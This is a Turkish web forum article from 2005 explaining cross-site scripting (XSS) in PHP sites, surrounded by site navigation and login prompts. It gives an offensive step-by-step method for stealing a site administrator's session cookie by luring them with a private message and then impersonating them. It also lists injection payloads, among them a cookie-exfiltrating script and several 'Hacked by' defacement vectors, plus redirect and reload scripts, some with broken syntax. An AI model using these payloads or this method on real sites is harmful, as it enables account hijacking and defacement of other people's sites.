Favorilerine Ekle | Giriş Sayfan Yap | Tavsiye Et

 

Kurs Tanıtım Sayfası | Süper Üye Kimdir? | Menü Tasarımı Konulu Örnek Ders
Kod İndir| Hazır Kodlar | Makaleler| İpuçları | VB .NET Kursu | Dersler | Forum | Alt Bölümler | Servisler
    Merhaba Misafir
    anasayfa » visual basic makaleleri » XSS nedir ?
Üye Girişi
Kullanıcı Adı:  
Şifre : 
Kaydet ?
Siteden tam olarak faydalanabilmek için üye olmalısınız.
Unuttuğunuz şifrenizi öğrenebilmek için kayıt sırasında verdiğiniz Hatırlatma Cevabı'nı bilmeniz gereklidir.
Şifre hatırlatma işlevini sadece 3 defa kullanma hakkınız vardır.
Kullanıcı adını ve şifresini unutan üyelere email ile yardım verilmez.

Aktivasyon Gelmedi mi?Aktivasyon mesajınız email adresinize gelmedi mi?
Buraya tıklayarak bir kez daha aktivasyon mesajı gönderilmesini sağlayabilirsiniz.
Lütfen email hesabınızın BULK ve SPAM klasörlerini de kontrol ediniz.
Rastgele Makale

resimden form yapmak. köşeli formlardan kurtulun.

Yazar: yener_turgut
arka plan rengi beyaz olarak tasarlanmış herhangi bir resim dosyası yardımıyla, standart dikdörtgen formlardan daha görsel ve eğlenceli tasarımlar yapılabilir. hazırlayıp eklediğim örnek program yardımcı olacaktır. aslında yapılan işlem sadece görüntülenen resmin arka plan rengi yani transparan olarak işaretlenecek olan pixellerin görüntü dışında bırakılması işlemidir. dolayısı ile form görüntüsü taranır ve beyaz olan noktalar iptal edilir. kolay gelsin.


Webmasterlar
Sitenize Ekleyin!
Sitenizde "Son Eklenen 10 Visual Basic Yazısı"'nı göstermek ve içeriğini zenginleştirmek için buraya tıklayınız.

Vbasicmaster.com'a link verin!
Aşağıdaki minik banneri sitenize eklemek için tıklayın!

Üye Sayısı:
Ziyaretçiler nerede?
Yayın № : 5325
Yayın Tar:11.12.2005
Yazar : TRagedy
Hit :3047

Bu Yazarın Yazıları Sadece bu yazarın  göster
Bu Yazıyı Tavsiye Et

örn :

[url]http://localhost/hedefdeneme/index.php?content=<h1>hebe hübele gibi[/url]

devam edelim...

Xss Hangi Sistemler Kullanılır..

Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır
ama Asp?de kullanılmaz anlamına gelmez..

Biraz daha örnekleyerek Anlatalım..

">nedirbu<"font%20size=20>Hacked by oturgaçlı götüreç%20:P</font>
basit bir arama scriptinde kullanılıcak açık..

Yukardaki Xss yi biraz daha açalım .

( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdiğimiz komut budur..

Session?da $username adlı bir değişken var diyelim.Sayfada echo?landığı $_SESSION[?variable?] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable?ı ekrana basacaktır.

ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...

Java Scripti Neden Çalıştırırız :

Cookie Çalmak İçin..
Örnekleyelim..

<script>document.location=?/xss/??+escape(document.cookie)</script>

Adım Adım XSS için bir method anlatayım..

İlk Önce Sitemize Cookie Çalıcağımız Script Yazılır...

daha Sonra Belirlediğimiz sitenin adminine bir dikkat çekici bir pm atılarak Admin Bizim Belirlediğimiz Siteye Yönlendirilir..
admin?inin Bilgisayarındaki Cookie?inn ayınsından bizim belirtiğimiz adrestedi script tarafından log tutulur..
daha sonra bu cookie burdan alınır bizim bilgisayarımızdaki cookie ile değiştirilir..
taskmanager.exe yi (xp için) kapatılır ve sitenin adresini tekrar yazıp girdiğimizi zaman sitede ki Kullanıcı Adımız : Admin olduğunu tüm yetkilere sahip olduğumuzu görürüz..

Xss Komutları :


<IMG src= "">ascript:alert(?Hacked by ...?);">

<IMG SRC=javascript:alert(?XSS?)>

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

<IMG DYNsrc= "javascript alert Hacked by..">

<BR SIZE="&{alert(?Hacked by...)}">

<IMG src= "vbscript msgboxHacked by..">

<DIV STYLE="background-image: url(javascript:alert(?Hacked by...))">


Sisteme JavaScript Ekleyerek İstediğimiz sayfaya yönlendirmek te Diğer Bir Yöntemdir..

<script language="javascript">
self.location="gidilecek_sayfa.htm"
</script>

<script language="VBscript">
response.redirect""
</script>

<script>
window.location = "";
</script>

<script LANGUAGE="JavaScript">
<!-- Begin
function redirectPage() {
var url640x480 = "";
var url800x600 = "";
var url1024x768 ="";
if ((screen.width == 640) && (screen.height == 480))
window.location.href= url640x480;
else if ((screen.width == 800) && (screen.height == 600))
window.location.href= url800x600;
else if ((screen.width == 1024) && (screen.height == 76)
window.location.href= url1024x768;
else window.location.href= url640x480;
}
// End -->
</script>

<meta http-equiv="Refresh" content="1;URL=http://www.xxx.com/">

<script>
function sayfayi_yenile()
{self.location.refresh()}

self.setTimeOut(?sayfayi_yenile()?,5000)
</script>


<script>
window.setTimeout("location.reload()",10000);
</script>

<script>
location.reload();
</script>





Yorumlar, eklemeler ve düşünceler
        tam çalamamışın...
v2 sini yazdım .

   Rawkmetal, 02.01.2006 22:19
© Hakan Ersöz 2000-2013| Üyelik Sözleşmesi | | Ödeme Bildirimi
Sitemizden yenilikleri hemen öğrenin, pop upları engelleyin, chat yapın... ToolBarımızı indirin:
Vasicmaster Toolbar'ı indirin